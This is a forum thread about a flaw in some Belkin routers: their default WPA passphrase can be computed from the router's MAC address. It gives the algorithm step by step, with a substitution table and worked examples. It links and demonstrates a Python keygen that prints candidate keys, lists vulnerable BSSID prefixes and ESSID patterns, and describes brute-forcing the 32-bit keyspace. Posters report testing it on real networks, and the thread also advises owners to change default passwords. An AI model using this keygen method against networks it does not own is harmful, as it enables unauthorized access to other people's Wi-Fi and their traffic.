Belkin SSID and WPA/WPA2 correlation.

[soxrok2212]

Please do not use this on a network you do not own! I am not responsible for what you do with this information! This is just to demonstrate Belkin's SEVERE security flaw and it doesn't look like they're going to fix the issue.

I do not own this information. All information is from this PDF, and all credit goes to Numlock. Eftecno posted this in a comment below but it is in Italian and a bit hard to follow so I'll do an example here.

The most common SSID you will see is belkin.xxx, so I'll do an example for that. Here are the steps:

1.) Find the wlan mac address of the target router. In this case, I'll pull one from ebay (looked at the pictures): 08:86:3B:05:3A:41 I don't know how long this listing will last and I hope I don't break any rules but just to prove that this works there is the listing. Look at the shipping price, too! ;D

2.) Add 1 to the end of the mac address: 08:86:3B:05:3A:42

3.) Remove the first 2 pairs from the mac address (08:86), so you're left with 3B:05:3A:42

4.) Take the 8 characters in the mac address and rearrange them so they are in this order: 62:38:51:74. So 3B:05:3A:42 would change to AB023345.

5.) Use this conversion chart and replace the corresponding values we just calculated, AB023345.

Code:

0123456789ABCDEF
944626378ace9bdf

So,

Code:

A = c
B = e
0 = 9
2 = 4
3 = 6
3 = 6
4 = 2
5 = 6

The password is ce946626

Try yours yourself now!

Also, have a look at the PDF above. There are other algorithms for other models and a few special cases for each algorithm if one doesn't work.

An online tool is availible here.

If you own a Belkin router, I HIGHLY recommend that you change the default password and SSID. Don't worry about mac address filtering or hiding your SSID, those can be easily overcome. Also, disable WPS if you can, although most of the routers feature a 3 pin max failure so if you try and fail 3 times, it locks WPS until the unit is rebooted.

Still having trouble? Have a look a BigJim's comment on page 2, his post may be able to help you out if you're stuck!

Good luck!

[kcdtv]

that is not (almost) completely different but pretty close

four 6 on one side and three 6 on the other one. And then very closed leter, 2 d and one c.... there is a table of conversion and a movement like in a array here, i guess.
You should maybe try to check the serial and cee if that doesn't help to make sense.

i think there is something here, good luck

[soxrok2212]

that is not (almost) completely different but pretty close

four 6 on one side and three 6 on the other one. And then very closed leter, 2 d and one c.... there is a table of conversion and a movement like in a array here, i guess.
You should maybe try to check the serial and cee if that doesn't help to make sense.

i think there is something here, good luck

Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml

Anyways, I was thinking they were different because I was looking at them in pairs of 2, ex: [55][66][66][77] and [56][66][67][78]. So the pairs don't match up but I'll look into it. I don't think it has anything to do with the serial numbers because according to the news post, they were able to recover the password strictly from the mac address. Thanks for the reply though!

[soxrok2212]

Anyone have any ideas???

[soxrok2212]

I stumped... no idea where to look for more info...

[kcdtv]

Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml

No
aparently they simply didn't find anything, this post is year old and they simply didn't find the stuff
They were not able to see that the PIN WPS is made on the bssid in a straight relationship as I revealed more than one year ago WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

For me it is total bullshiting when they pretend to have the algorithm.
They are as closed as you.
Isn't it strange to to present something and than say just after " anyway guys, with 8 caracters hex, this can be bruteforced if you have
a good card"
Thanks for the news !!!!
bullshit.!!!

So they seem to don't say what they know, concerned by the bad use that can be made xith their discover
But on the other hand give this kind of information " buy a good card and you can break the defaukt password even if we are wrong"

Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [1]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.

That make absolutely no sense to do not demonstarte what you pretend to have discovered but then say this obvious ****.
Anyway, if you say something; demonstrate it otherwise go to ****, i am not use to believe people that tell me that something is like this but refuse to demonstrate it, this is not theology but computers.
Calling them searcher is a joke, for telling us that with oldashcat and last ATI we get 100000 password/seconds...
Calling this a full disclosure is a joke too

Good luck in your project because there is still something to do about this routers, with the last N models that seems to use the same algorithm but with a 16 digits passphrase.

that the original by the way : http://www.jakoblell.com/blog/2012/1...eless-routers/

[soxrok2212]

that the original by the way : http://www.jakoblell.com/blog/2012/1...eless-routers/

I actually e-mailed Jakob Lell and he said that he decided not to release the tables to the public...

Anyways, I tried chopping down this post to make it sweeter but it gave me an error, I'll try again later.

[soxrok2212]

double post - oops

[kcdtv]

I don't know man, i don't beleive at all taht they found the algorithm... if so anyway it is still to be revealed and all credits will go to the one that speaks.
It is still impossible for me to understand the fact that on the one hand you give a way to break it buy buying a video card and on the other hand the only thing that is interesting and that you need to expose to prov something you do not reveals keep for some obscure reason
they have stock options in amd or what?
This man is asking us to believe him on word and that not how it works, sorry for him, that's a hard world
Don't give up

[eftecno]

This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

http://www38.zippyshare.com/v/89004997/file.html

[BigJim]

This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

http://www38.zippyshare.com/v/89004997/file.html

Great! thanks for sharing

[soxrok2212]

This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

http://www38.zippyshare.com/v/89004997/file.html

I'm having trouble following the equation, specifically this part:

Code:

MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
 08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667

I don't understand what happens here. Any ideas? Thanks for the post though!

[BigJim]

I'm having trouble following the equation, specifically this part:

Code:

MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
 08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667

I don't understand what happens here. Any ideas? Thanks for the post though!

You can't know the MAC but you can calculate it MAC = WLAN +1
or in special cases MAC = WLAN MAC +2

08:86:3B:B7:39:2F + 1 = 08:86:3B:B7:39:30

order according to the sequence

Code:

MAC __:__:62:38:51:74 12345678
    08:86:3B:B7:39:30 

MAC __:__:  :  : 1:   12345678  
    08:86:  :  : 9:   9        

MAC __:__: 2:  :  :   12345678 
    08:86: B:  :  :   9B      

MAC __:__:  :3 :  :   12345678 
    08:86:  :B :  :   9BB

MAC __:__:  :  :  : 4 12345678  
    08:86:  :  :  : 0 9BB0

MAC __:__:  :  :5 :   12345678  
    08:86:  :  :3 :   9BB03        

MAC __:__:6 :  :  :   12345678 
    08:86:3 :  :  :   9BB033      

MAC __:__:  :  :  :7  12345678 
    08:86:  :  :  :3  9BB0333

MAC __:__:  : 8:  :   12345678  
    08:86:  : 7:  :   9BB03337

then replace the values

Code:

0123456789ABCDEF 9BB03337
944626378ace9bdf 

0123456789ABCDEF 9BB03337 
         a       a 

0123456789ABCDEF 9BB03337 
           e     ae

0123456789ABCDEF 9BB03337 
           e     aee

0123456789ABCDEF 9BB03337 
9                aee9

0123456789ABCDEF 9BB03337 
   6             aee96 

0123456789ABCDEF 9BB03337 
   6             aee966

0123456789ABCDEF 9BB03337 
   6             aee9666

0123456789ABCDEF 9BB03337 
       7         aee96667

enjoy

[soxrok2212]

Thanks I figured it out last night before I check on here but thanks for the post! I updated the original post too and I'll reference you!

[mmusket33]

For those that want to read the original document the following Italian to English is provided:

caratteri character
esadecimale hexadecimal
maiuscolo uppercase
conversione conversion
ordine order
modelli models
casi particolari special cases

[soxrok2212]

Tested this on some Ebay listings, it works! Anyone else have any success?

[dudux]

Here you go a proof-of-concept by using the PDF :


https://bitbucket.org/dudux/belkin4xx

If you find out bugs or something, let me know via email.

$ python belkin4xx.py -h
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
[-a | -l]

>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-w [WORDLIST], --wordlist [WORDLIST]
Filename to store keys
-a, --allkeys Create all possible cases. Definitely recommended if
first attempt fails
-l, --list List all vulnerable mac address so far

required:
-b [BSSID], --bssid [BSSID]
Target bssid
-e [ESSID], --essid [ESSID]
Target essid. [BelkinXXXX,belkin.XXXX]

(+) Help: python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de


$ python belkin4xx.py -l
[+] Possible vulnerable targets so far:

essid: Belkin.XXXX
essid: Belkin_XXXXXX
essid: belkin.xxxx
essid: belkin.xxx

bssid: 94:44:52:uv:wx:yz
bssid: 08:86:3B:uv:wx:yz
bssid: EC:1A:59:uv:wx:yz

$ python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de
[+] Your WPA key might be :
040D93B0

$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
[+] Your WPA key might be :
d49496b9

$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
[+] Your WPA keys might be :
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0


$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
$ cat keys.txt
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0

[soxrok2212]

Here you go a proof-of-concept by using the PDF :


https://bitbucket.org/dudux/belkin4xx

If you find out bugs or something, let me know via email.

This is awesome! Can you share install instructions?

[slim76]

This is awesome! Can you share install instructions?

Try this:

python belkin4xx.py -b 94:44:52:00:C0:EF -e Belkin.c0de

[dudux]

You can run it on Windows,MacOSx or any Linux.

For instance on debian/Ubuntu systems:

$ sudo apt-get install git
$ git clone https://[email protected]/dudux/belkin4xx.git

And read the usage.

p.s.- if you can help me out to make it more accurate......... Just send me data.

UPDATED: More accurate and fixes

$ python belkin4xx.py -v
belkin4xx.py 1.4 [2014-05-06]

[Fruitopia]

Sorry for the gravedig, but I just wanna let everyone know that this still works. I just tested it on a belkin.xxx network.